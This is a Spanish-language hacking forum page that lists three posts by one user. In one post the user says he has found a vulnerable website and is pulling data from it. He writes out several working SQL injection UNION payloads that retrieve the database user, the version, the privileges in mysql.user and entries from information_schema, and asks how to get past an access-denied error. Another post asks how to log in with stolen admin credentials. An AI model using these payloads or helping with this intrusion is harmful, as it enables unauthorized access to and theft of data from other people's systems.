Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - fulldebian

#1
Hacking Wireless / REGISTRO WIRELES
24 Septiembre 2010, 23:51 PM
hola buenos dias
Tengo una duda
se que windows xp lleva registro de todo lo que hacemos  o conectamos en la computadora
Mi notebook tiene una placa wifi, me gustaria saber si es posible leer los registros a ver cuando se conecto esta placa wifi, se que es posible, si alguien puede orientarme a hacerlo


Desde ya muchas gracias
#2
hola amigos
lei el tuto, muy bueno, encontre por suerte una web vulnerable, que me costo un bocho pero le estoy sacando datoss:

.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(current_user()))/*
me tiro el usuario

.php?id=-1/**/union/**/all/**/select/**/1,unhex(hex(version()))/*
me da la version

al quere conocer el pass, por ejemplo con lo mencionado en el tuto:

http://localhost/print.php?id=-1+union+all+select+1,concat(host,0x3a,user,0x3a,Select_priv,0x3a,Insert_priv,0x3a,Update_pri
v,0x3a,Delete_priv,0x3a,Create_priv,0x3a,Drop_priv,0x3a,Reload_priv,0x3a,Shutdown_priv,0x3a,P
rocess_priv,0x3a,File_priv,0x3a,Grant_priv,0x3a,References_priv,0x3a,Index_priv,0x3a,Alter_priv,
0x3a,Show_db_priv,0x3a,Super_priv,0x3a,Create_tmp_table_priv,0x3a,Lock_tables_priv,0x3a,Exe
cute_priv,0x3a,Repl_slave_priv,0x3a,Repl_client_priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+m
ysql.user--

http://localhost/print.php?id=-1+union+all+select+1,concat(grantee,0x3a,table_schema,0x3a,privilege_type),3,4,5,6,7,8,9,10,
11,12,13,14,15,16+FROM+information_schema.schema_privileges--
http://localhost/print.php?
id=-1+union+all+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name,0x3a,privileg
e_type),3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_schema.column_privileges--


o cuando quiero ver el archivo etc/password

http://localhost/print.php?id=-1+union+all+select+1,schema_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16+FROM+information_s
chema.schem



me aparece que el usuario no puede acceder a la base de datos:

Access denied for user 'yyduhf' to database 'information_schema'

como puede seguir? estoy estancado......
gracias amigos
#3
Nivel Web / Re: SQL Injection Tool
2 Enero 2009, 14:30 PM
holaamigo muy buen program !
te hago una consulta ya que estoy nuevo en esto, supongamos que yo consigo el user y pass del admin o de un usuario, como seria la web para acceder al sistema? como me logueo para entrar en la base de datos?
mil gracias